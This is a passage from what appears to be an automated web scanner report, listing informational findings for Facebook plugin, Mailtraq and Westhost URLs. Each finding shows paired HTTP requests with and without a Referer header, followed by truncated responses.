<input name="partner_id" value="" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u318595_2"><input value="Sign Up" type="submit" id="u318595_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u318595_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent"><div class="mhs fbEmptyWidget fbWidgetTitle"><div class="mbs">No recent activity to display.</div><div><div>Put some like buttons on your website to engage your users. Details can be found <a target="_blank" href="http://developers.facebook.com/docs/reference/plugins/">here</a>.</div></div></div></div></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1" aria-hidden="true"><i class="img sp_bnqbay sx_fa6595"></i></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="fss fwn fcg"><span><a class="uiLinkSubtle" target="_blank" href="http://developers.facebook.com/plugins/?footer=2">Facebook social plugin</a></span></div></div></div></div></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:443252,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"AQDoYYJd",no_cookies:1,lhsh:"fAQATpz9V",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"4GrDC":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.ph
...[SNIP]...

15.9. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?action=like&api_key=238200696226156&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df124d2da04%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fforums.cpanel.net%2Fshowthread.php%3Ft%3D96021&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.35.34
X-Cnection: close
Date: Fri, 16 Sep 2011 19:42:58 GMT
Content-Length: 26142

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e73a6c245e5a9c79706676" class="connect_widget" style="font-family: &quot;tahoma&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=forums.cpanel.net&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fforums.cpanel.net%2Ff43%2Fconnection-imap-server-failed-96021.html&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_w
...[SNIP]...

Request 2

GET /plugins/like.php?action=like&api_key=238200696226156&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df124d2da04%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fforums.cpanel.net%2Fshowthread.php%3Ft%3D96021&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.35.58
X-Cnection: close
Date: Fri, 16 Sep 2011 19:43:07 GMT
Content-Length: 25961

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e73a6cb0c59e6f72172380" class="connect_widget" style="font-family: &quot;tahoma&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span c
...[SNIP]...

15.10. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18399f63c%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.133.31
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:41 GMT
Content-Length: 9190

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e73f1b1d5ccd0a58556979" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">125,234</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18399f63c%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.85.47
X-Cnection: close
Date: Sat, 17 Sep 2011 01:02:47 GMT
Content-Length: 9144

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e73f1b7302fd6954042333" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">125,234</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

15.11. http://www.mailtraq.com/30day  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mailtraq.com
Path:   /30day

Request 1

GET /30day HTTP/1.1
Host: www.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/imap
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200
Cache-Control: private
Connection: close
Date: Fri, 16 Sep 2011 19:49:48 GMT
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: 6464-query=; path=/; HttpOnly;
Set-Cookie: 6464%2Dformreferer=http%3A%2F%2Finfo%2Emailtraq%2Ecom%2Fimap; path=/
Set-Cookie: 6464%2Duserid=%2D3712022; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27682

<html><head><!-- Google Website Optimizer Tracking Script -->
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['gwo._setAccount', 'UA-19482991-2']);
_gaq.push(['gwo._trackPageview', '/4007400623/goal']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<!-- End of Google Website Optimizer Tracking Script --><title>Mailtraq - 30 Day Full Trial</title><meta name="description" content="Mailtraq Email Server the easy to use complete email server solution for Outlook and Exchange Alternative. SMTP, POP3, IMAP, Webmail, Outlook Calendars, anti-spam and anti-virus" /><meta name="keywords" content="Email Server, Mail Server, Emailserver, Mailtraq, Enstar, Webmail, IMAP, SMTP, POP3, Anti-Virus, Anti-Spam, Groupware, Collaboration, Outlook, Exchange, Exchange Alternative, Complete Email Server" /><meta http-equiv="imagetoolbar" content="no" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="canonical" href="http://www.mailtraq.com/30day" /><base href="http://www.mailtraq.com/552/" /><script type="text/javascript">/*<![CDATA[*/var s = document.write('<!' + '--'); /*]]>*/</script><meta http-equiv="refresh" content="2; URL=http://www.mailtraq.com/552/form.nc?NoScript=1" /><script type="text/javascript">//--></script><script type="text/javascript">/*<![CDATA[*/var ncSiteId = 6464, ncFeatureId = 552, ncBaseHref = 'http://www.mailtraq.com/552/';if(ncBaseHref == '' && ncFeatureId > 0 && locatio
...[SNIP]...

Request 2

GET /30day HTTP/1.1
Host: www.mailtraq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200
Cache-Control: private
Connection: close
Date: Fri, 16 Sep 2011 19:50:05 GMT
Content-Type: text/html; Charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: 6464-query=; path=/; HttpOnly;
Set-Cookie: 6464%2Duserid=%2D3712022; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27682

<html><head><!-- Google Website Optimizer Tracking Script -->
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['gwo._setAccount', 'UA-19482991-2']);
_gaq.push(['gwo._trackPageview', '/4007400623/goal']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
<!-- End of Google Website Optimizer Tracking Script --><title>Mailtraq - 30 Day Full Trial</title><meta name="description" content="Mailtraq Email Server the easy to use complete email server solution for Outlook and Exchange Alternative. SMTP, POP3, IMAP, Webmail, Outlook Calendars, anti-spam and anti-virus" /><meta name="keywords" content="Email Server, Mail Server, Emailserver, Mailtraq, Enstar, Webmail, IMAP, SMTP, POP3, Anti-Virus, Anti-Spam, Groupware, Collaboration, Outlook, Exchange, Exchange Alternative, Complete Email Server" /><meta http-equiv="imagetoolbar" content="no" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="canonical" href="http://www.mailtraq.com/30day" /><base href="http://www.mailtraq.com/552/" /><script type="text/javascript">/*<![CDATA[*/var s = document.write('<!' + '--'); /*]]>*/</script><meta http-equiv="refresh" content="2; URL=http://www.mailtraq.com/552/form.nc?NoScript=1" /><script type="text/javascript">//--></script><script type="text/javascript">/*<![CDATA[*/var ncSiteId = 6464, ncFeatureId = 552, ncBaseHref = 'http://www.mailtraq.com/552/';if(ncBaseHref == '' && ncFeatureId > 0 && location.href.indexOf('/' + ncFeatureId + '/') == -1){ncBaseHref = (location.href.indexOf
...[SNIP]...

15.12. http://www.westhost.com/images/bluegradbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.westhost.com
Path:   /images/bluegradbg.gif

Request 1

GET /images/bluegradbg.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15689
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="referer" value="http://members.westhost.com/v2/sm_sa_email_imap.html" />
<label for="name" >Your Name<span class="req">*</span></label><br />
<input type="text" name="name" id="name" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="email" >Email Address<span class="req">*</span></label><br />
<input type="text" name="email" id="email" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="comments" >Please add your comments / describe the problem further<span class="req">*</span></label><br />
<textarea name="comments" id="comments" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;"></textarea><br/><br/>
   <!--<label for="captcha" >Enter the code shown in the image<span class="req">*</span></label><br />
   <input type="text" class="text" name="captcha" id="captcha" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" /><br /><br />-->
    <input type="submit" name="submit" value="Submit" />
</form>
</div>
<!-- CONTENT END -->
</div> <!-- #bodymain -->
<div class="bodybase">&nbsp;</div>


</div> <!-- #mainwhite -->

<div id="logostrip">
<div class="logotext">
<!-- Who's Using Westhost? -->
</div> <!-- .logotext -->
<div id="services"></div>
</div> <!-- #logostrip -->
<div class="clear"></div>

<div id="basetext">
<div class="basecol">
<h3>Hosting Solutions</h3>
<a href="/web-hosting/" title="Web Hosting">Web Hosting</a><br />
<a href="/reseller-hosting/" title="Reseller Hosting">Reseller Hosting</a><br />
<a href="/cloud-hosting/" title="Cloud Servers">Cloud Servers</a><br />
<a href="/managed-dedicated-servers/" title="Dedicated Servers">Dedicated Servers</a><br />

<h3>Domain Registration</h3>
<a href="/domain-registration/" title="Register a Domain ">Register a Domain</a><br />
<a href="/domain-hosting.html" title="Domain Hosting">
...[SNIP]...

Request 2

GET /images/bluegradbg.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15637
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="referer" value="" />
<label for="name" >Your Name<span class="req">*</span></label><br />
<input type="text" name="name" id="name" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="email" >Email Address<span class="req">*</span></label><br />
<input type="text" name="email" id="email" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="comments" >Please add your comments / describe the problem further<span class="req">*</span></label><br />
<textarea name="comments" id="comments" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;"></textarea><br/><br/>
   <!--<label for="captcha" >Enter the code shown in the image<span class="req">*</span></label><br />
   <input type="text" class="text" name="captcha" id="captcha" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" /><br /><br />-->
    <input type="submit" name="submit" value="Submit" />
</form>
</div>
<!-- CONTENT END -->
</div> <!-- #bodymain -->
<div class="bodybase">&nbsp;</div>


</div> <!-- #mainwhite -->

<div id="logostrip">
<div class="logotext">
<!-- Who's Using Westhost? -->
</div> <!-- .logotext -->
<div id="services"></div>
</div> <!-- #logostrip -->
<div class="clear"></div>

<div id="basetext">
<div class="basecol">
<h3>Hosting Solutions</h3>
<a href="/web-hosting/" title="Web Hosting">Web Hosting</a><br />
<a href="/reseller-hosting/" title="Reseller Hosting">Reseller Hosting</a><br />
<a href="/cloud-hosting/" title="Cloud Servers">Cloud Servers</a><br />
<a href="/managed-dedicated-servers/" title="Dedicated Servers">Dedicated Servers</a><br />

<h3>Domain Registration</h3>
<a href="/domain-registration/" title="Register a Domain ">Register a Domain</a><br />
<a href="/domain-hosting.html" title="Domain Hosting">Domain Hosting</a><br />
</div> <!-- .basecol1 -->
...[SNIP]...

15.13. http://www.westhost.com/images/boxtopbackground.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.westhost.com
Path:   /images/boxtopbackground.gif

Request 1

GET /images/boxtopbackground.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15695
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="referer" value="http://members.westhost.com/v2/sm_sa_email_imap.html" />
<label for="name" >Your Name<span class="req">*</span></label><br />
<input type="text" name="name" id="name" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="email" >Email Address<span class="req">*</span></label><br />
<input type="text" name="email" id="email" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="comments" >Please add your comments / describe the problem further<span class="req">*</span></label><br />
<textarea name="comments" id="comments" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;"></textarea><br/><br/>
   <!--<label for="captcha" >Enter the code shown in the image<span class="req">*</span></label><br />
   <input type="text" class="text" name="captcha" id="captcha" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" /><br /><br />-->
    <input type="submit" name="submit" value="Submit" />
</form>
</div>
<!-- CONTENT END -->
</div> <!-- #bodymain -->
<div class="bodybase">&nbsp;</div>


</div> <!-- #mainwhite -->

<div id="logostrip">
<div class="logotext">
<!-- Who's Using Westhost? -->
</div> <!-- .logotext -->
<div id="services"></div>
</div> <!-- #logostrip -->
<div class="clear"></div>

<div id="basetext">
<div class="basecol">
<h3>Hosting Solutions</h3>
<a href="/web-hosting/" title="Web Hosting">Web Hosting</a><br />
<a href="/reseller-hosting/" title="Reseller Hosting">Reseller Hosting</a><br />
<a href="/cloud-hosting/" title="Cloud Servers">Cloud Servers</a><br />
<a href="/managed-dedicated-servers/" title="Dedicated Servers">Dedicated Servers</a><br />

<h3>Domain Registration</h3>
<a href="/domain-registration/" title="Register a Domain ">Register a Domain</a><br />
